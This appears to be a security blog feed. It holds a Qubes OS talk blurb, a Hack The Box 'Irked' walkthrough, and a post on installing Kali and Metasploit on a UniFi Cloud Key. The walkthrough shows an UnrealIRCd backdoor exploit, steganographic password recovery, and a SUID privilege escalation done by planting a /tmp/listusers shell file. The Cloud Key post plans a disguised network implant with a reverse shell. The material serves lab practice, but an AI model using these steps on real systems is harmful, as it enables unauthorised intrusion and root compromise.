I recently gave a quick talk as an introduction to Qubes OS at SecIC, a local CitySec meetup. I’ve been using Qubes OS off and on for a while and recently bought a ThinkPad x230 to dedicate to running it. The slides are available below and I’ll link to the talk once it is uploaded.
HTB: Irked
As usual, we will start off with a nmap scan.
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) 80/tcp open http Apache httpd 2.4.10 ((Debian)) 111/tcp open rpcbind 2-4 (RPC #100000) 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 34271/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd
Looks like irc is running on a couple ports as well as httpd. Taking into account the name of the box, its probably safe to assume irc is the way in, but first lets look at the website.
Hmm, lets pull down that jpg for later.
A quick google of UnrealIRCd returns a backdoor in the 3.2.8.1 (cve-2010-2075) release and there is a Metasploit module. Lets set it up on port 8067 and see what we get.
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor): Name Current Setting Required Description ---- --------------- -------- ----------- RHOST 10.10.10.117 yes The target address RPORT 8067 yes The target port (TCP)
Works and we get dropped into a user named ircd.
whoami ircd
Looking through home directories, there are a couple interesting files found in another user’s Documents directory.
/home/djmardov/Documents ls -lah total 16K drwxr-xr-x 2 djmardov djmardov 4.0K May 15 2018 . drwxr-xr-x 18 djmardov djmardov 4.0K Nov 23 10:40 .. -rw-r--r-- 1 djmardov djmardov 52 May 16 2018 .backup -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt
Catting out the .backup file gives us a password and a bit of a hint.
Super elite steg backup pw UP********************ss
Now, we have a password and a hint pointing to stego. Lets look at the jpg we downloaded earlier with steghide.
steghide extract -sf irked.jpg
This gives use another file, pass.txt.
Ka************HG
Using that password to ssh in as the user that owned the file, we now have access to user.txt and a clean shell.
cat user.txt 4a****************************8e
After a bit of enumeration, we find an executable with an interesting name.
find / -user root -perm -4000 -print 2>/dev/null /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/openssh/ssh-keysign /usr/lib/spice-gtk/spice-client-glib-usb-acl-helper /usr/sbin/exim4 /usr/sbin/pppd /usr/bin/chsh /usr/bin/procmail /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/pkexec /usr/bin/X /usr/bin/passwd /usr/bin/chfn /usr/bin/viewuser /sbin/mount.nfs /bin/su /bin/mount /bin/fusermount /bin/ntfs-3g /bin/umount
Running that gives us one more hint. It looks like its calling another file.
/usr/bin/viewuser (unknown) :0 2018-11-22 12:34 (:0) sh: 1: /tmp/listusers: not found This application is being devleoped to set and test user permissions It is still being actively developed
Creating a file containing /bin/bash in that location and running it again gives us a root shell and the root flag.
echo "/bin/bash" > /tmp/listusers chmod +x /tmp/listusers /usr/bin/viewuser (unknown) :0 2018-11-22 12:34 (:0) whoami root cat /root/root.txt 8d****************************f3
NOTE: We do not need to use the djmardov user for this, in fact. The privesc can be done via the ircd user, then the user flag can be accessed via the root user. This is, however, probably not the intended path.
This was a pretty direct machine, however the use of stego to hide a password is a little unrealistic. A few of the new machines being added to the active lineup have been more real-world, for example DevOops, which make them a bit more fun.
Unifi Kali Key?
I have used UniFi/Ubiquiti network products for quiet some time now. I’ve deployed their hardware at many past customers and used it for most of my home network. Recently, I had to manually update the firmware on my Cloud Key via a shell and did some poking around on it. It seems to just be an ARM device with Debian and some software installed. Since it accepts POE for power and looks pretty innocuous in a network rack, I thought it would be an interesting device to get some of the Kali tool-set to run on.
To start off, here is a link to the official product page. This device is a purpose built “server”, which runs Ubiquiti’s UniFi controller software, is powered over POE, has an SD card slot, and has a simple web interface for managing the device itself. Ubiquiti offers a “cloud” management system as well, allowing network management over the Internet, hence the name Cloud Key. As for hardware specs, it has 2Gb of RAM, 16Gb onboard MMC storage, and a quad-core ARM CPU. There has been some hardware revisions, it seems, and I believe what I have here is a third generation, which includes USB C for external power and a physical power button.
After powering it up and getting SSHed in, I started snooping around the Debian install.
root@UniFi-CloudKey:~# uname -a Linux UniFi-CloudKey 3.10.20-ubnt-mtk #2 SMP PREEMPT Mon Jan 8 12:40:11 PST 2018 armv7l GNU/Linux
root@UniFi-CloudKey:~# lspci pcilib: Cannot open /proc/bus/pci lspci: Cannot find any working access method.
root@UniFi-CloudKey:~# lscpu Architecture: armv7l Byte Order: Little Endian CPU(s): 4 On-line CPU(s) list: 0-3 Thread(s) per core: 1 Core(s) per socket: 4 Socket(s): 1 CPU max MHz: 1300.0000 CPU min MHz: 598.0000
root@UniFi-CloudKey:~# lsblk NAME MAJ:MIN RM SIZE RO TYPE MOUNTPOINT mmcblk0rpmb 179:96 0 4M 0 disk mmcblk0boot0 179:32 0 4M 1 disk mmcblk0boot1 179:64 0 4M 1 disk mmcblk0 179:0 0 14.7G 0 disk |-mmcblk0p1 179:1 0 512K 0 part |-mmcblk0p2 179:2 0 256K 0 part |-mmcblk0p3 179:3 0 256K 0 part |-mmcblk0p4 179:4 0 32M 0 part |-mmcblk0p5 179:5 0 32M 0 part |-mmcblk0p6 179:6 0 1G 0 part /mnt/.rofs |-mmcblk0p7 179:7 0 3G 0 part /mnt/.rwfs `-mmcblk0p8 179:8 0 10.6G 0 part /srv mmcblk1 179:128 0 7.4G 0 disk `-mmcblk1p1 179:129 0 7.4G 0 part /data mtdblock0 31:0 0 64K 1 disk mtdblock1 31:1 0 960K 0 disk
root@UniFi-CloudKey:~# free -m total used free shared buffers cached Mem: 2017 715 1302 5 124 420 -/+ buffers/cache: 170 1847 Swap: 0 0 0
root@UniFi-CloudKey:~# df -h Filesystem Size Used Avail Use% Mounted on aufs-root 2.9G 354M 2.6G 13% / udev 10M 0 10M 0% /dev tmpfs 404M 396K 404M 1% /run /dev/disk/by-label/userdata 2.9G 354M 2.6G 13% /mnt/.rwfs /dev/disk/by-partlabel/rootfs 291M 291M 0 100% /mnt/.rofs tmpfs 1009M 0 1009M 0% /dev/shm tmpfs 5.0M 0 5.0M 0% /run/lock tmpfs 1009M 0 1009M 0% /sys/fs/cgroup tmpfs 1009M 0 1009M 0% /tmp /dev/mmcblk0p8 11G 137M 11G 2% /srv /dev/mmcblk1p1 7.2G 17M 7.2G 1% /data
root@UniFi-CloudKey:~# apt list --installed Listing... Done acl/oldstable,now 2.2.52-2 armhf [installed] adduser/oldstable,now 3.113+nmu3 all [installed] apt/oldstable,oldstable,now 1.0.9.8.4 armhf [installed] apt-transport-https/oldstable,oldstable,now 1.0.9.8.4 armhf [installed] apt-utils/oldstable,oldstable,now 1.0.9.8.4 armhf [installed] aufs-tools/oldstable,now 1:3.2+20130722-1.1 armhf [installed] base-files/now 8+deb8u10 armhf [installed,upgradable to: 8+deb8u11] base-passwd/oldstable,now 3.5.37 armhf [installed] bash/oldstable,now 4.3-11+deb8u1 armhf [installed] binutils/oldstable,now 2.25-5+deb8u1 armhf [installed] bluez/oldstable,oldstable,now 5.23-2+deb8u1 armhf [installed] bsdutils/oldstable,now 1:2.25.2-6 armhf [installed] busybox/oldstable,now 1:1.22.0-9+deb8u4 armhf [installed] busybox-syslogd/oldstable,now 1:1.22.0-9+deb8u4 all [installed] ca-certificates/oldstable,now 20141019+deb8u4 all [installed] cloudkey-webui/now 2.0.10-1 all [installed,local] coreutils/oldstable,now 8.23-4 armhf [installed] cpio/oldstable,oldstable,now 2.11+dfsg-4.1+deb8u1 armhf [installed] cpufrequtils/oldstable,now 008-1 armhf [installed] cron/oldstable,now 3.0pl1-127+deb8u1 armhf [installed] cron-apt/oldstable,now 0.9.2 all [installed] curl/oldstable,oldstable,now 7.38.0-4+deb8u11 armhf [installed] dash/oldstable,now 0.5.7-4+b1 armhf [installed] dbus/oldstable,now 1.8.22-0+deb8u1 armhf [installed] debconf/oldstable,now 1.5.56+deb8u1 all [installed] debconf-i18n/oldstable,now 1.5.56+deb8u1 all [installed] debian-archive-keyring/oldstable,now 2017.5~deb8u1 all [installed] debianutils/oldstable,now 4.4+b1 armhf [installed] dialog/oldstable,now 1.2-20140911-1 armhf [installed] diffutils/oldstable,now 1:3.3-1+b1 armhf [installed] dmeventd/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed] dmsetup/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed] dpkg/oldstable,now 1.17.27 armhf [installed] e2fslibs/oldstable,now 1.42.12-2+b1 armhf [installed] e2fsprogs/oldstable,now 1.42.12-2+b1 armhf [installed] ethtool/oldstable,now 1:3.16-1 armhf [installed] findutils/oldstable,now 4.4.2-9+b1 armhf [installed] firmware-atheros/oldstable,now 0.43 all [installed] freeradius/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed] freeradius-common/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 all [installed] freeradius-ldap/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed] freeradius-utils/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed] gcc-4.8-base/oldstable,now 4.8.4-1 armhf [installed] gcc-4.9-base/oldstable,oldstable,now 4.9.2-10+deb8u1 armhf [installed] gnupg/oldstable,oldstable,now 1.4.18-7+deb8u5 armhf [installed] gpgv/oldstable,oldstable,now 1.4.18-7+deb8u5 armhf [installed] grep/oldstable,now 2.20-4.1 armhf [installed] gzip/oldstable,now 1.6-4 armhf [installed] hostname/oldstable,now 3.15 armhf [installed] htop/oldstable,now 1.0.3-1 armhf [installed] init/oldstable,now 1.22 armhf [installed] init-system-helpers/oldstable,now 1.22 all [installed] initramfs-tools/oldstable,now 0.120+deb8u3 all [installed] initscripts/oldstable,now 2.88dsf-59 armhf [installed] insserv/oldstable,now 1.14.0-5 armhf [installed] iperf/oldstable,now 2.0.5+dfsg1-2 armhf [installed] iproute/oldstable,now 1:3.16.0-2 all [installed] iproute2/oldstable,now 3.16.0-2 armhf [installed] iptables/oldstable,now 1.4.21-2+b1 armhf [installed] iputils-ping/oldstable,now 3:20121221-5+b2 armhf [installed] jsvc/oldstable,now 1.0.15-6+deb8u1 armhf [installed] klibc-utils/oldstable,now 2.0.4-2 armhf [installed] kmod/oldstable,now 18-3 armhf [installed] less/oldstable,now 458-3 armhf [installed] libacl1/oldstable,now 2.2.52-2 armhf [installed] libapparmor1/oldstable,now 2.9.0-3 armhf [installed] libapt-inst1.5/oldstable,oldstable,now 1.0.9.8.4 armhf [installed] libapt-pkg4.12/oldstable,oldstable,now 1.0.9.8.4 armhf [installed] libasound2/oldstable,now 1.0.28-1 armhf [installed] libasound2-data/oldstable,now 1.0.28-1 all [installed] libattr1/oldstable,now 1:2.4.47-2 armhf [installed] libaudit-common/oldstable,now 1:2.4-1 all [installed] libaudit1/oldstable,now 1:2.4-1+b1 armhf [installed] libblkid1/oldstable,now 2.25.2-6 armhf [installed] libboost-filesystem1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed] libboost-program-options1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed] libboost-system1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed] libboost-thread1.55.0/oldstable,now 1.55.0+dfsg-3 armhf [installed] libbsd0/oldstable,now 0.7.0-2 armhf [installed] libbz2-1.0/oldstable,now 1.0.6-7+b3 armhf [installed] libc-bin/oldstable,oldstable,now 2.19-18+deb8u10 armhf [installed] libc6/oldstable,oldstable,now 2.19-18+deb8u10 armhf [installed] libcap-ng0/oldstable,now 0.7.4-2 armhf [installed] libcap2/oldstable,now 1:2.24-8 armhf [installed] libcap2-bin/oldstable,now 1:2.24-8 armhf [installed] libcomerr2/oldstable,now 1.42.12-2+b1 armhf [installed] libcommons-daemon-java/oldstable,now 1.0.15-6+deb8u1 all [installed] libcpufreq0/oldstable,now 008-1 armhf [installed] libcryptsetup4/oldstable,now 2:1.6.6-5 armhf [installed] libcurl3/oldstable,oldstable,now 7.38.0-4+deb8u11 armhf [installed] libcurl3-gnutls/oldstable,oldstable,now 7.38.0-4+deb8u11 armhf [installed] libdb5.3/oldstable,now 5.3.28-9+deb8u1 armhf [installed] libdbus-1-3/oldstable,now 1.8.22-0+deb8u1 armhf [installed] libdebconfclient0/oldstable,now 0.192 armhf [installed] libdevmapper-event1.02.1/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed] libdevmapper1.02.1/oldstable,now 2:1.02.90-2.2+deb8u1 armhf [installed] libedit2/oldstable,now 3.1-20140620-2 armhf [installed] libevent-2.0-5/oldstable,oldstable,now 2.0.21-stable-2+deb8u1 armhf [installed] libexpat1/oldstable,oldstable,now 2.1.0-6+deb8u4 armhf [installed] libffi6/oldstable,oldstable,now 3.1-2+deb8u1 armhf [installed] libfreeradius2/oldstable,oldstable,now 2.2.5+dfsg-0.2+deb8u1 armhf [installed] libgcc1/oldstable,oldstable,now 1:4.9.2-10+deb8u1 armhf [installed] libgcrypt20/oldstable,now 1.6.3-2+deb8u5 armhf [installed] libgdbm3/oldstable,now 1.8.3-13.1 armhf [installed] libglib2.0-0/oldstable,now 2.42.1-1+b1 armhf [installed] libgmp10/oldstable,now 2:6.0.0+dfsg-6 armhf [installed] libgnutls-deb0-28/oldstable,now 3.3.8-6+deb8u7 armhf [installed] libgnutls-openssl27/oldstable,now 3.3.8-6+deb8u7 armhf [installed] libgpg-error0/oldstable,now 1.17-3 armhf [installed] libgssapi-krb5-2/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed] libhogweed2/oldstable,now 2.7.1-5+deb8u2 armhf [installed] libicu52/oldstable,oldstable,now 52.1-8+deb8u7 armhf [installed] libidn11/oldstable,now 1.29-1+deb8u3 armhf [installed] libjson-c2/oldstable,now 0.11-4 armhf [installed] libk5crypto3/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed] libkeyutils1/oldstable,now 1.5.9-5+b1 armhf [installed] libklibc/oldstable,now 2.0.4-2 armhf [installed] libkmod2/oldstable,now 18-3 armhf [installed] libkrb5-3/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed] libkrb5support0/oldstable,now 1.12.1+dfsg-19+deb8u4 armhf [installed] libldap-2.4-2/oldstable,now 2.4.40+dfsg-1+deb8u3 armhf [installed,upgradable to: 2.4.40+dfsg-1+deb8u4] liblocale-gettext-perl/oldstable,now 1.05-8+b1 armhf [installed] liblockfile-bin/oldstable,now 1.09-6 armhf [installed] libltdl7/oldstable,now 2.4.2-1.11 armhf [installed] liblvm2cmd2.02/oldstable,now 2.02.111-2.2+deb8u1 armhf [installed] liblzma5/oldstable,now 5.1.1alpha+20120614-2+b3 armhf [installed] liblzo2-2/oldstable,now 2.08-1.2 armhf [installed] libmagic1/now 1:5.22+15-2+deb8u3 armhf [installed,upgradable to: 1:5.22+15-2+deb8u4] libmount1/oldstable,now 2.25.2-6 armhf [installed] libncurses5/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3] libncursesw5/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3] libnettle4/oldstable,now 2.7.1-5+deb8u2 armhf [installed] libnfnetlink0/oldstable,now 1.0.1-3 armhf [installed] libnl-3-200/oldstable,now 3.2.24-2 armhf [installed] libnl-route-3-200/oldstable,now 3.2.24-2 armhf [installed] libonig2/oldstable,now 5.9.5-3.2+deb8u1 armhf [installed] libopts25/oldstable,now 1:5.18.4-3 armhf [installed] libp11-kit0/oldstable,now 0.20.7-1 armhf [installed] libpam-modules/oldstable,now 1.1.8-3.1+deb8u2+b1 armhf [installed] libpam-modules-bin/oldstable,now 1.1.8-3.1+deb8u2+b1 armhf [installed] libpam-runtime/oldstable,now 1.1.8-3.1+deb8u2 all [installed] libpam-usermapper/now 0.1 armhf [installed,local] libpam0g/oldstable,now 1.1.8-3.1+deb8u2+b1 armhf [installed] libparted2/oldstable,now 3.2-7 armhf [installed] libpcap0.8/oldstable,now 1.6.2-2 armhf [installed] libpci3/oldstable,now 1:3.2.1-3 armhf [installed] libpcre3/oldstable,now 2:8.35-3.3+deb8u4 armhf [installed] libpcrecpp0/oldstable,now 2:8.35-3.3+deb8u4 armhf [installed] libperl4-corelibs-perl/oldstable,now 0.003-1 all [installed] libperl5.20/oldstable,oldstable,now 5.20.2-3+deb8u11 armhf [installed] libpopt0/oldstable,now 1.16-10 armhf [installed] libprocps3/oldstable,oldstable,now 2:3.3.9-9+deb8u1 armhf [installed] libpsl0/oldstable,now 0.5.1-1 armhf [installed] libpython-stdlib/oldstable,now 2.7.9-1 armhf [installed] libpython2.7/oldstable,now 2.7.9-2+deb8u1 armhf [installed] libpython2.7-minimal/oldstable,now 2.7.9-2+deb8u1 armhf [installed] libpython2.7-stdlib/oldstable,now 2.7.9-2+deb8u1 armhf [installed] libqdbm14/oldstable,now 1.8.78-5+b1 armhf [installed] libreadline5/oldstable,now 5.2+dfsg-2 armhf [installed] libreadline6/oldstable,now 6.3-8+b3 armhf [installed] librtmp1/oldstable,oldstable,now 2.4+20150115.gita107cef-1+deb8u1 armhf [installed] libsasl2-2/oldstable,oldstable,now 2.1.26.dfsg1-13+deb8u1 armhf [installed] libsasl2-modules-db/oldstable,oldstable,now 2.1.26.dfsg1-13+deb8u1 armhf [installed] libselinux1/oldstable,now 2.3-2 armhf [installed] libsemanage-common/oldstable,now 2.3-1 all [installed] libsemanage1/oldstable,now 2.3-1+b1 armhf [installed] libsepol1/oldstable,now 2.3-2 armhf [installed] libslang2/oldstable,now 2.3.0-2 armhf [installed] libsmartcols1/oldstable,now 2.25.2-6 armhf [installed] libsnappy1/oldstable,now 1.1.2-3 armhf [installed] libsqlite3-0/oldstable,now 3.8.7.1-1+deb8u2 armhf [installed] libss2/oldstable,now 1.42.12-2+b1 armhf [installed] libssh2-1/oldstable,oldstable,now 1.4.3-4.1+deb8u1 armhf [installed] libssl1.0.0/oldstable,now 1.0.1t-1+deb8u9 armhf [installed] libstdc++6/oldstable,oldstable,now 4.9.2-10+deb8u1 armhf [installed] libsystemd0/oldstable,now 215-17+deb8u7 armhf [installed] libtasn1-6/oldstable,oldstable,now 4.2-3+deb8u3 armhf [installed] libtext-charwidth-perl/oldstable,now 0.04-7+b4 armhf [installed] libtext-iconv-perl/oldstable,now 1.7-5+b2 armhf [installed] libtext-wrapi18n-perl/oldstable,now 0.06-7 all [installed] libtinfo5/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3] libudev1/oldstable,now 215-17+deb8u7 armhf [installed] libusb-0.1-4/oldstable,now 2:0.1.12-25 armhf [installed] libusb-1.0-0/oldstable,now 2:1.0.19-1 armhf [installed] libustr-1.0-1/oldstable,now 1.0.4-3+b2 armhf [installed] libuuid1/oldstable,now 2.25.2-6 armhf [installed] libv8-3.14.5/oldstable,now 3.14.5.8-8.1 armhf [installed] libwrap0/oldstable,now 7.6.q-25 armhf [installed] libx11-6/oldstable,now 2:1.6.2-3+deb8u1 armhf [installed] libx11-data/oldstable,now 2:1.6.2-3+deb8u1 all [installed] libxau6/oldstable,now 1:1.0.8-1 armhf [installed] libxcb1/oldstable,now 1.10-3+b1 armhf [installed] libxdmcp6/oldstable,now 1:1.1.1-1+b1 armhf [installed] libxext6/oldstable,now 2:1.3.3-1 armhf [installed] libxi6/oldstable,now 2:1.7.4-1+deb8u1 armhf [installed] libxml2/oldstable,oldstable,now 2.9.1+dfsg1-5+deb8u6 armhf [installed] libxrender1/oldstable,now 1:0.9.8-1+b1 armhf [installed] libxtables10/oldstable,now 1.4.21-2+b1 armhf [installed] libxtst6/oldstable,now 2:1.2.2-1+deb8u1 armhf [installed] linux-image-3.10.20-ubnt-mtk/now 2.1 armhf [installed,local] login/oldstable,oldstable,now 1:4.2-3+deb8u4 armhf [installed] logrotate/oldstable,now 3.8.7-1+b1 armhf [installed] lsb-base/oldstable,now 4.1+Debian13+nmu1 all [installed] lsb-release/oldstable,now 4.1+Debian13+nmu1 all [installed] lsof/oldstable,now 4.86+dfsg-1 armhf [installed] lvm2/oldstable,now 2.02.111-2.2+deb8u1 armhf [installed] mawk/oldstable,now 1.3.3-17 armhf [installed] mime-support/oldstable,now 3.58 all [installed] mongodb-clients/oldstable,now 1:2.4.10-5+deb8u1 armhf [installed] mongodb-server/oldstable,now 1:2.4.10-5+deb8u1 armhf [installed] mount/oldstable,now 2.25.2-6 armhf [installed] mtd-utils/oldstable,now 1:1.5.1-1 armhf [installed] multiarch-support/oldstable,oldstable,now 2.19-18+deb8u10 armhf [installed] ncurses-base/now 5.9+20140913-1+deb8u2 all [installed,upgradable to: 5.9+20140913-1+deb8u3] ncurses-bin/now 5.9+20140913-1+deb8u2 armhf [installed,upgradable to: 5.9+20140913-1+deb8u3] net-tools/oldstable,now 1.60-26+b1 armhf [installed] netbase/oldstable,now 5.3 all [installed] nginx-common/oldstable,oldstable,now 1.6.2-5+deb8u5 all [installed] nginx-light/oldstable,oldstable,now 1.6.2-5+deb8u5 armhf [installed] openssh-client/oldstable,now 1:6.7p1-5+deb8u5 armhf [installed] openssh-server/oldstable,now 1:6.7p1-5+deb8u5 armhf [installed] openssh-sftp-server/oldstable,now 1:6.7p1-5+deb8u5 armhf [installed] openssl/oldstable,now 1.0.1t-1+deb8u9 armhf [installed] oracle-java8-jdk/now 8u151 armhf [installed,local] parted/oldstable,now 3.2-7 armhf [installed] passwd/oldstable,oldstable,now 1:4.2-3+deb8u4 armhf [installed] pciutils/oldstable,now 1:3.2.1-3 armhf [installed] perl/oldstable,oldstable,now 5.20.2-3+deb8u11 armhf [installed] perl-base/oldstable,oldstable,now 5.20.2-3+deb8u11 armhf [installed] perl-modules/oldstable,oldstable,now 5.20.2-3+deb8u11 all [installed] php5-cli/oldstable,now 5.6.36+dfsg-0+deb8u1 armhf [installed] php5-common/oldstable,now 5.6.36+dfsg-0+deb8u1 armhf [installed] php5-fpm/oldstable,now 5.6.36+dfsg-0+deb8u1 armhf [installed] php5-json/oldstable,now 1.3.6-1 armhf [installed] procps/oldstable,oldstable,now 2:3.3.9-9+deb8u1 armhf [installed] psmisc/oldstable,now 22.21-2 armhf [installed] python/oldstable,now 2.7.9-1 armhf [installed] python-minimal/oldstable,now 2.7.9-1 armhf [installed] python2.7/oldstable,now 2.7.9-2+deb8u1 armhf [installed] python2.7-minimal/oldstable,now 2.7.9-2+deb8u1 armhf [installed] readline-common/oldstable,now 6.3-8 all [installed] rfkill/oldstable,now 0.5-1 armhf [installed] sed/oldstable,now 4.2.2-4+deb8u1 armhf [installed] sensible-utils/oldstable,oldstable,now 0.0.9+deb8u1 all [installed] ssl-cert/oldstable,now 1.0.35 all [installed] startpar/oldstable,now 0.59-3 armhf [installed] sudo/oldstable,now 1.8.10p3-1+deb8u5 armhf [installed] systemd/oldstable,now 215-17+deb8u7 armhf [installed] systemd-networkd-fallbacker/now 0.3 armhf [installed,local] systemd-sysv/oldstable,now 215-17+deb8u7 armhf [installed] sysv-rc/oldstable,now 2.88dsf-59 all [installed] sysvinit-utils/oldstable,now 2.88dsf-59 armhf [installed] tar/oldstable,oldstable,now 1.27.1-2+deb8u1 armhf [installed] tcpdump/oldstable,oldstable,now 4.9.2-1~deb8u1 armhf [installed] tzdata/now 2017c-0+deb8u1 all [installed,upgradable to: 2018e-0+deb8u1] ubnt-archive-keyring/now 1.0-1 all [installed,local] ubnt-freeradius-setup/now 0.1 all [installed,local] ubnt-mtk-initramfs/now 1.1 all [installed,local] ubnt-tools/now 0.9.7-1 armhf [installed,local] ubnt-unifi-setup/now 0.2.1 all [installed,local] ucf/oldstable,now 3.0030 all [installed] udev/oldstable,now 215-17+deb8u7 armhf [installed] unifi/now 5.6.29-10253 all [installed,upgradable to: 5.8.28-11052-1] usbutils/oldstable,now 1:007-2 armhf [installed] util-linux/oldstable,now 2.25.2-6 armhf [installed] vim-common/oldstable,now 2:7.4.488-7+deb8u3 armhf [installed] vim-tiny/oldstable,now 2:7.4.488-7+deb8u3 armhf [installed] vlan/oldstable,now 1.9-3.2 armhf [installed] wget/oldstable,oldstable,now 1.16-1+deb8u5 armhf [installed] x11-common/oldstable,now 1:7.7+7 all [installed] xz-utils/oldstable,now 5.1.1alpha+20120614-2+b3 armhf [installed] zlib1g/oldstable,now 1:1.2.8.dfsg-2+b1 armhf [installed]
I eventually found some interesting Ubnt-* tools. These are used to do some firmware and service related tasks. It looks like some features are duplicated in different tools.
root@UniFi-CloudKey:~# ubnt-unifi-setup Usage: /usr/sbin/ubnt-unifi-setup start|stop
root@UniFi-CloudKey:~# ubnt-systool Ubiquiti system tools, v1.0 Usage: /sbin/ubnt-systool[] supported commands: timezone hostname network fwupdate fwupdatestatus resetbutton <true|false> pwcheck chpasswd adminname reboot poweroff reset2defaults cleanup led
root@UniFi-CloudKey:~# ubnt-tools Ubiquiti system tools Copyright 2006-2015, Ubiquiti Networks, Inc. <support@ubnt.com> This program is proprietary software; you can not redistribute it and/or modify it without signed agreement with Ubiquiti Networks, Inc. bgnd ubnt-discover infctld pwcheck fwupdate fwinfo fsync hwaddr sysusermerge
With all that out of the way, I decided to try to just add the Kali repo and install something from it. First I need to install nano, I guess.
I added the Kali repo, added the gpg key for their repo, updated package lists, then tried to install metasploit.
echo "deb http://http.kali.org/kali kali-rolling main non-free contrib" >> /etc/apt/sources.list apt-key adv --recv-keys --keyserver keyserver.ubuntu.com 7D8D0BF6 apt update apt install metasploit-framework
And metasploit works!
With that being a success, there are a few issues that need to be addressed. First, the UniFi controller software is still running, possibly spewing packets to the network, looking for APs and switches. That, along with some other unneeded software, can easily be removed. Two, due to how the onboard MMC storage is partitioned, the root filesystem only has about 1.5G left after the MSF install. I’m sure I can find a way to use other partitions or SD card for storage. I’ll work on that later, since its not breaking anything yet. Three, I need to set up an automatic reverse shell, since the intent is to not be logging into this thing locally. And lastly, some encrypted storage probably wouldn’t be a bad idea as well.
Part two is coming soon…